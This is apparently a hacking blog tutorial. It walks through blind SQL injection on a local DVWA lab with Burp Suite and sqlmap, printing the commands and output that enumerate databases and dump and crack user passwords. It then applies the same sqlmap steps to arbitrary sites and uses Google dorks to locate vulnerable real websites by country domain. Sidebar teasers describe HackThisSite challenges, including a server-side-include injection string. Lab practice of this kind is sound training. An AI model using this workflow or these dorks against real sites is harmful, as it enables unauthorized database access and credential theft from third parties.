Skip to main content

How to Hack sql Vulnerable websites ?


WITH BURP SUIT AND SQLMAP 

This tutorial is for educational purpose only and please dont use it for any unethical purpose and this blog or its author wont be responsible for the after effects you face if you do something unethical
For this example Iam testing on DVWA(Damn Vulnerable Web Application),Blind SQL injection

Blind SQL Injection
++++++++++++++++++++
-tamper data with burp suit(if you dont know ,there are lot of tutorials) and find cookie
security=low; PHPSESSID=q5ceoc6r4kr3t3kpfppma5l4e1
-run sqlmap
-copy our weppage url(DVWA)
http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1

-in sql map type following command

sqlmap -u 'http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1' --cookie="security=low; PHPSESSID=q5ceoc6r4kr3t3kpfppma5l4e1" --dbs

-in my case i must use sqlmap.py since i use windows for this test 

sqlmap.py -u 'http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1' --cookie="security=low; PHPSESSID=q5ceoc6r4kr3t3kpfppma5l4e1" --dbs

got error

[*] starting at 20:47:29

[20:47:29] [CRITICAL] invalid target URL

[*] shutting down at 20:47:29


-saved the contents intersepted by burp to sqlmap folder,named it gn
-changed sqlmap commad as

sqlmap.py -r gn --dbs

 -selected required options( yes or no questions asked by sqlmap,you can read and choose according to your wish)
-----------  

output:

-----------
  
available databases [9]:
[*] dvwa
[*] hack
[*] information_schema
[*] mysql
[*] performance_schema
[*] pkmnrpg
[*] pokenet
[*] test
[*] warlegeds

-now iam targeting tables of dvwa databases
command:

sqlmap.py -r gn -D dvwa --tables

output tables:


|guestbook |
|    users     |

-now i focus on users
command:

sqlmap.py -r gn -D dvwa -T users --columns

-got output:


Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| comment    | varchar(300)         |
| comment_id | smallint(5) unsigned |
| name       | varchar(100)         |
+------------+----------------------+
-now i need to find values in user and password columns,also crack password using sqlmap
command:
sqlmap.py -r gn -D dvwa -T users -C user,password --dump

Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 1a1dc91c907325c69271ddf0c944bc72 (pass)     |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

WITH SQLMAP ALONE

If you are unable to find cookie,Just run SQL Map and make sure site is vulnerable
now type in command

sqlmap -u www.example.com/something.php?id=2 --dbs

and once you get the database name follow the same steps as we do with burp,only difference with this is we donot provide cookie to sqlmap.

HOW TO FIND SQL VULNERABLE WEBSITES?

Well the easy way is by google dorks.You can learn it by searching and learing google hacking..its a set of keywords we use to craft tricking search to google to get our desired output.
example:
products.php?id= site:.uk
products.php?id= site:.pk
here site: look for the site endimg like .pk for pakistan .uk for united kingdom
there are other keywords like inurl:,intext:,etc

HOPE YOU LEARN SOMETHING NEW BUT MAKE SURE YOU DON'T Misuse IT IF you Find some Vulnerability try to Report it to the Admins..You may Get some reward ..Be Ethical

Comments

Post a Comment

Popular posts from this blog

Hack This Site Basic 10

Please enter a password to gain access to level 10 Only this much is written as hint.What we should do? I have tried reading the source code and there is no hint how the password is validated.So,we have no other way than intercepting the data.Once we enter the password and hit submit the password along with some request is sent to the server by the browser.There can be very vital information in this request.What we do is intercept this request before it is sent to the server.For this we use "Burp Suit" or some extensions for tampering data.For chrome and firefox,we have tamper data addon.Iam using chrome add on:  Tamper Chrome HOW TO USE IT? *Right click somewhere and select inspect. *Now select the three arrows pointing right on top right corner. *Now select  Tamper from it(make sure you have added the extension in             chrome). *Now input some password in out mission or leave it empty and hit submit. *You will see a new tab with the request det
Post a Comment
Read more

Hack This Site Basic 6

Network Security Sam has encrypted his password. The encryption system is publically available and can be accessed with this form: There we have been given with the same encryptor used by Sam .There is no other choice in my mind than guessing the password with the help of this encryptor. We have Sam's encrypted password already :3ff8;j<9 >Now we need to find by giving which value we get the output as 3. >when i given 'a' my output was 'a',which means no change. >So,I tried giving '3' and as expected, answer was 3. >So i pushed my luck and tried '3f',the first two letters,in encryptor ,Output was '3g'    this was clearly giving us hint.first letter has no change,second letter change by one alphabet or           letter ,clearly from 'abcdefg' >with this in mind iam giving input for encryption as '3ed',Huraaah!, it was successful and given output as '3ff'. >now its easy to break down ...
Post a Comment
Read more

Hack This Site Basic 8

Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/  However, Sam's young daughter Stephanie has just learned to program in PHP. She's talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote a script to demonstrate her ability. So, we know the password is stored in some obscured password file.  Lets try the same code as we did in level 7. But the code 'ls' is not treated as command. so lets try it differently. Try with aaa;<!--ls--> it also failed but got a message: If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to
2 comments
Read more